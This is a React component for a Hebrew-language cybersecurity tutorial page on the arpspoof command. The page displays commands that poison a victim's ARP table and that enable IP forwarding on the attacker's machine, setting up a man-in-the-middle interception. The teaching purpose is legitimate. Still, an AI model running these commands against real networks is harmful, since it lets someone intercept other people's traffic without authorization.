import React, { Component } from 'react';
import './ArpspoofCommand.css';
import companyLogo from './../../../../../../assets/Images/regex.png';
import { Consumer } from "../../../../../Context";
import Button from '@mui/material/Button';
import { FontAwesomeIcon } from '@fortawesome/react-fontawesome'
import { faArrowRight, faCheckSquare } from '@fortawesome/free-solid-svg-icons'
import { Table, TableBody, TableCell, TableHead, TableRow } from '@mui/material';
import ShellTerminal from '../../../Linux/Shell/ShellTerminal/ShellTerminal';
export default class ArpspoofCommand extends Component {


    render() {


        return (
            <Consumer>
                {
                    c => {


                        return (
                            <div className="paper ArpspoofCommand" >
                                <h4></h4>
                                <div className="img-div"><img src={companyLogo} /></div>

                                <p>
                                    <b style={{ fontSize: "17pt", color: "#15aebd" }}>arpspoof Command</b>
                                </p>


                                <p className="c9">
                                    <b>ההתקפה בפועל</b>
                                    <span className="c0">
                                        arpspoof -i [interface] -t [clientIP] -r [gateway]
                                    </span>
                                </p>

                                <p className="c9" >
                                    <span className="c1 c13 c15">
                                        "זיהום" טבלת ה ARP של הקורבן
                                    </span>
                                </p>

                                <p>
                                    <ShellTerminal user="<username>@<hostname>" location="[~]" cursor="sudo arpspoof -i eth0 -t 192.168.63.129 -r 192.168.1.254" />
                                </p>
                                <p className="c5"><span className="c0"></span></p>

                                <p className="c9" >
                                    <span className="c1 c13 c17">
                                        Port Forwarding
                                    </span>
                                </p>
                                <p className="c9">
                                    <span className="c0">
                                        בסופו של דבר המידע מיועד לכתובת ה IP של הקרבן, התוקף צריך להיות מסוגל להעביר מנות אשר מגיעות אליו המיועדות ליעדים אחרים (הקרבן). לינוקס משתמשת במשתנה הליבה net.ipv4.ip_forward כדי להפעיל או לכבות הגדרה זו.
                                    </span>
                                </p>

                                <p className="c5"><span className="c0"></span></p>

                                <p className="c9">
                                    <span className="c0">
                                        במחשב של התוקף נשנה את התכונה של זרימת המידע מהקורבן לנקודת היציאה ולהיפך, על ידי שינוי התכונה של port forwarding.
                                    </span>
                                </p>

                                <p>
                                    <ShellTerminal user="<username>@<hostname>" location="[~]" cursor="sudo echo 1 > /proc/sys/net/ipv4/ip_forward" />
                                </p>
                                <p className="c5"><span className="c0"></span></p>
                                <Button variant="contained" onClick={(e) => {
                                    // the first index is the array of objects in state.subjectsAndSubTopics, 
                                    // the second index is the index in the completed array in the state.subjectsAndSubTopics index
                                    let subjectsAndSubTopicsIndex = 24
                                    let completedIndex = 3
                                    let subjectsAndSubTopicsCompletedIndex = 2
                                    let obj = c.subjectsAndSubTopics[subjectsAndSubTopicsIndex]
                                    obj.completed[subjectsAndSubTopicsCompletedIndex] = faCheckSquare
                                    c.actions.setCompletedSubTopic(subjectsAndSubTopicsIndex, completedIndex)

                                }}>Next  <FontAwesomeIcon icon={faArrowRight} style={{ fontSize: '13pt', paddingLeft: '5px' }} /></Button>

                            </div>
                        )
                    }
                }
            </Consumer>)
    }

}
